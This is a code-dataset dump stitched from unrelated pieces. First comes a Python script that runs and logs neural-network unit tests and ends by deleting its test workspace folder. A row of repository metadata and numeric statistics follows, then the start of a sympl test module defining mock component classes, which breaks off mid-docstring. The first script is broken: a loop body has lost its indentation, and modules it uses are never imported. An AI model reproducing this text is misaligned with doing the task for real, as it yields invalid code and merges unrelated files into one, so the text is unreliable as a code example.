from test_optimizer_rmsprop import test_optimizer_rmsprop
from test_optimizer_adam import test_optimizer_adam
from test_optimizer_nadam import test_optimizer_nadam
from test_optimizer_adamax import test_optimizer_adamax
from test_optimizer_adadelta import test_optimizer_adadelta
from test_optimizer_adagrad import test_optimizer_adagrad
from test_loss_l1 import test_loss_l1
from test_loss_l2 import test_loss_l2
from test_loss_crossentropy import test_loss_crossentropy
from test_loss_binary_crossentropy import test_loss_binary_crossentropy
from test_loss_kldiv import test_loss_kldiv
from test_loss_hinge import test_loss_hinge
from test_loss_squared_hinge import test_loss_squared_hinge
origstdout = sys.stdout
print("Running Tests...");
sys.stdout = open("test_logs.txt", 'w');
system_dict = {};
system_dict["total_tests"] = 0;
system_dict["successful_tests"] = 0;
system_dict["failed_tests_lists"] = [];
system_dict["failed_tests_exceptions"] = [];
system_dict["skipped_tests_lists"] = [];
start = time.time()
exp_num = 1;
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_sgd(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_nesterov_sgd(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_rmsprop(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adam(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_nadam(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adamax(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adadelta(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adagrad(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_l1(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_l2(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_crossentropy(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_binary_crossentropy(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_kldiv(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_hinge(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_squared_hinge(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
from test_layer_convolution1d import test_layer_convolution1d
from test_layer_convolution2d import test_layer_convolution2d
from test_layer_convolution3d import test_layer_convolution3d
from test_layer_transposed_convolution2d import test_layer_transposed_convolution2d
from test_layer_transposed_convolution3d import test_layer_transposed_convolution3d
from test_layer_max_pooling1d import test_layer_max_pooling1d
from test_layer_max_pooling2d import test_layer_max_pooling2d
from test_layer_max_pooling3d import test_layer_max_pooling3d
from test_layer_average_pooling1d import test_layer_average_pooling1d
from test_layer_average_pooling2d import test_layer_average_pooling2d
from test_layer_average_pooling3d import test_layer_average_pooling3d
from test_layer_global_max_pooling1d import test_layer_global_max_pooling1d
from test_layer_global_max_pooling2d import test_layer_global_max_pooling2d
from test_layer_global_max_pooling3d import test_layer_global_max_pooling3d
from test_layer_global_average_pooling1d import test_layer_global_average_pooling1d
from test_layer_global_average_pooling2d import test_layer_global_average_pooling2d
from test_layer_global_average_pooling3d import test_layer_global_average_pooling3d
from test_layer_batch_normalization import test_layer_batch_normalization
from test_layer_identity import test_layer_identity
from test_layer_fully_connected import test_layer_fully_connected
from test_layer_dropout import test_layer_dropout
from test_layer_flatten import test_layer_flatten
from test_layer_concatenate import test_layer_concatenate
from test_layer_add import test_layer_add
from test_activation_relu import test_activation_relu
from test_activation_softmax import test_activation_softmax
from test_activation_thresholded_relu import test_activation_thresholded_relu
from test_activation_elu import test_activation_elu
from test_activation_prelu import test_activation_prelu
from test_activation_leaky_relu import test_activation_leaky_relu
from test_activation_selu import test_activation_selu
from test_activation_softplus import test_activation_softplus
from test_activation_softsign import test_activation_softsign
from test_activation_tanh import test_activation_tanh
from test_activation_sigmoid import test_activation_sigmoid
from test_activation_hard_sigmoid import test_activation_hard_sigmoid
from test_initializer_xavier_normal import test_initializer_xavier_normal
from test_initializer_xavier_uniform import test_initializer_xavier_uniform
from test_initializer_random_normal import test_initializer_random_normal
from test_initializer_random_uniform import test_initializer_random_uniform
from test_initializer_lecun_normal import test_initializer_lecun_normal
from test_initializer_lecun_uniform import test_initializer_lecun_uniform
from test_initializer_he_normal import test_initializer_he_normal
from test_initializer_he_uniform import test_initializer_he_uniform
from test_initializer_truncated_normal import test_initializer_truncated_normal
from test_initializer_orthogonal import test_initializer_orthogonal
from test_initializer_variance_scaling import test_initializer_variance_scaling
from test_block_resnet_v1 import test_block_resnet_v1
from test_block_resnet_v2 import test_block_resnet_v2
from test_block_resnet_v1_bottleneck import test_block_resnet_v1_bottleneck
from test_block_resnet_v2_bottleneck import test_block_resnet_v2_bottleneck
from test_block_resnext import test_block_resnext
from test_block_mobilenet_v2_linear_bottleneck import test_block_mobilenet_v2_linear_bottleneck
from test_block_mobilenet_v2_inverted_linear_bottleneck import test_block_mobilenet_v2_inverted_linear_bottleneck
from test_block_squeezenet_fire import test_block_squeezenet_fire
from test_block_densenet import test_block_densenet
from test_block_conv_bn_relu import test_block_conv_bn_relu
from test_block_inception_a import test_block_inception_a
from test_block_inception_b import test_block_inception_b
from test_block_inception_c import test_block_inception_c
from test_block_inception_d import test_block_inception_d
from test_block_inception_e import test_block_inception_e
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_batch_normalization(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_identity(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_fully_connected(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_dropout(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_flatten(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softmax(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_thresholded_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_elu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_prelu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_leaky_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_selu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softplus(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_softsign(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_tanh(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_sigmoid(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_activation_hard_sigmoid(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_concatenate(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_add(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_xavier_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_xavier_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_random_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_random_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_lecun_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_lecun_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_he_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_he_uniform(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_truncated_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_orthogonal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_initializer_variance_scaling(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v1(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v2(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v1_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnet_v2_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_resnext(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_mobilenet_v2_linear_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_mobilenet_v2_inverted_linear_bottleneck(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_squeezenet_fire(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_densenet(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_conv_bn_relu(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_a(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_b(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_c(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_block_inception_e(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
sys.stdout = open("test_logs.txt", 'a');
end = time.time();
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("");
for i in range(len(system_dict["failed_tests_lists"])):
print("{}. Failed Test:".format(i+1));
print("Name - {}".format(system_dict["failed_tests_lists"][i]));
print("Error - {}".format(system_dict["failed_tests_exceptions"][i]));
print("");
print("Skipped Tests List - {}".format(system_dict["skipped_tests_lists"]));
print("");
sys.stdout = origstdout;
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("See test_logs.txt for errors");
print("");
os.system("rm -r workspace");
| 35.143353
| 113
| 0.711372
| 3,782
| 30,399
| 5.372819
| 0.033845
| 0.160433
| 0.126772
| 0.07874
| 0.822441
| 0.764469
| 0.75876
| 0.75
| 0.75
| 0.75
| 0
| 0.005936
| 0.135531
| 30,399
| 865
| 114
| 35.143353
| 0.767305
| 0
| 0
| 0.729358
| 0
| 0
| 0.284441
| 0.001513
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.122324
| 0
| 0.122324
| 0.501529
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
fa9c54781754c2560415d01606793ad6b5b43910
| 73,392
|
py
|
Python
|
tests/test_base_components.py
|
JoyMonteiro/sympl
|
c8bee914651824360a46bf71119dd87a93a07219
|
[
"BSD-3-Clause"
] | 46
|
2017-01-05T00:21:18.000Z
|
2022-03-05T12:20:39.000Z
|
tests/test_base_components.py
|
JoyMonteiro/sympl
|
c8bee914651824360a46bf71119dd87a93a07219
|
[
"BSD-3-Clause"
] | 47
|
2017-03-27T13:37:31.000Z
|
2022-02-02T07:14:22.000Z
|
tests/test_base_components.py
|
JoyMonteiro/sympl
|
c8bee914651824360a46bf71119dd87a93a07219
|
[
"BSD-3-Clause"
] | 11
|
2017-01-27T23:03:34.000Z
|
2020-06-22T20:05:49.000Z
|
import pytest
import mock
import numpy as np
import unittest
from sympl import (
TendencyComponent, DiagnosticComponent, Monitor, Stepper, ImplicitTendencyComponent,
datetime, timedelta, DataArray, InvalidPropertyDictError,
ComponentMissingOutputError, ComponentExtraOutputError,
InvalidStateError
)
def same_list(list1, list2):
    """Return True when *list1* and *list2* contain the same items,
    irrespective of order.

    Membership is checked in both directions, so duplicate items are
    treated leniently (e.g. [1, 1, 2] and [1, 2, 2] compare equal).
    """
    if len(list1) != len(list2):
        return False
    forward = all(item in list2 for item in list1)
    backward = all(item in list1 for item in list2)
    return forward and backward
class MockTendencyComponent(TendencyComponent):
    """TendencyComponent test double with configurable properties.

    Records every call to ``array_call`` and returns the canned
    tendency/diagnostic outputs supplied at construction time.
    """

    input_properties = None
    diagnostic_properties = None
    tendency_properties = None

    def __init__(
            self, input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output, **kwargs):
        """Store the property dicts and canned outputs, then init the base."""
        # Call-recording state.
        self.times_called = 0
        self.state_given = None
        # Property dicts and canned return values, set before the base
        # constructor runs.
        self.input_properties = input_properties
        self.diagnostic_properties = diagnostic_properties
        self.tendency_properties = tendency_properties
        self.diagnostic_output = diagnostic_output
        self.tendency_output = tendency_output
        super(MockTendencyComponent, self).__init__(**kwargs)

    def array_call(self, state):
        """Record the raw state and return (tendencies, diagnostics)."""
        self.times_called += 1
        self.state_given = state
        return self.tendency_output, self.diagnostic_output
class MockImplicitTendencyComponent(ImplicitTendencyComponent):
    """ImplicitTendencyComponent test double with configurable properties.

    Records every call to ``array_call`` (state and timestep) and returns
    the canned outputs supplied at construction time.
    """

    input_properties = None
    diagnostic_properties = None
    tendency_properties = None

    def __init__(
            self, input_properties, diagnostic_properties, tendency_properties,
            diagnostic_output, tendency_output, **kwargs):
        """Store the property dicts and canned outputs, then init the base."""
        # Call-recording state.
        self.times_called = 0
        self.state_given = None
        self.timestep_given = None
        # Property dicts and canned return values, set before the base
        # constructor runs.
        self.input_properties = input_properties
        self.diagnostic_properties = diagnostic_properties
        self.tendency_properties = tendency_properties
        self.diagnostic_output = diagnostic_output
        self.tendency_output = tendency_output
        super(MockImplicitTendencyComponent, self).__init__(**kwargs)

    def array_call(self, state, timestep):
        """Record state and timestep, return (tendencies, diagnostics)."""
        self.times_called += 1
        self.state_given = state
        self.timestep_given = timestep
        return self.tendency_output, self.diagnostic_output
class MockDiagnosticComponent(DiagnosticComponent):
    """DiagnosticComponent test double with configurable properties.

    Records every call to ``array_call`` and returns the canned
    diagnostic output supplied at construction time.
    """

    input_properties = None
    diagnostic_properties = None

    def __init__(
            self, input_properties, diagnostic_properties, diagnostic_output,
            **kwargs):
        """Store the property dicts and canned output, then init the base."""
        # Call-recording state.
        self.times_called = 0
        self.state_given = None
        # Property dicts and the canned return value.
        self.input_properties = input_properties
        self.diagnostic_properties = diagnostic_properties
        self.diagnostic_output = diagnostic_output
        super(MockDiagnosticComponent, self).__init__(**kwargs)

    def array_call(self, state):
        """Record the raw state and return the canned diagnostics."""
        self.times_called += 1
        self.state_given = state
        return self.diagnostic_output
class MockStepper(Stepper):
    """Stepper test double with configurable properties.

    Records every call to ``array_call`` (state and timestep) and returns
    the canned diagnostic/state outputs supplied at construction time.
    """

    input_properties = None
    diagnostic_properties = None
    output_properties = None

    def __init__(
            self, input_properties, diagnostic_properties, output_properties,
            diagnostic_output, state_output,
            **kwargs):
        """Store the property dicts and canned outputs, then init the base."""
        # Call-recording state.
        self.times_called = 0
        self.state_given = None
        self.timestep_given = None
        # Property dicts and canned return values.
        self.input_properties = input_properties
        self.diagnostic_properties = diagnostic_properties
        self.output_properties = output_properties
        self.diagnostic_output = diagnostic_output
        self.state_output = state_output
        super(MockStepper, self).__init__(**kwargs)

    def array_call(self, state, timestep):
        """Record state and timestep, return (diagnostics, new state)."""
        self.times_called += 1
        self.state_given = state
        self.timestep_given = timestep
        return self.diagnostic_output, self.state_output
class MockMonitor(Monitor):
    """Monitor test double whose ``store`` discards every state."""

    def store(self, state):
        """Accept a state and do nothing with it."""
        pass
class BadMockTendencyComponent(TendencyComponent):
    """Improperly constructed TendencyComponent double.

    NOTE: ``__init__`` does not call ``super().__init__()`` — presumably
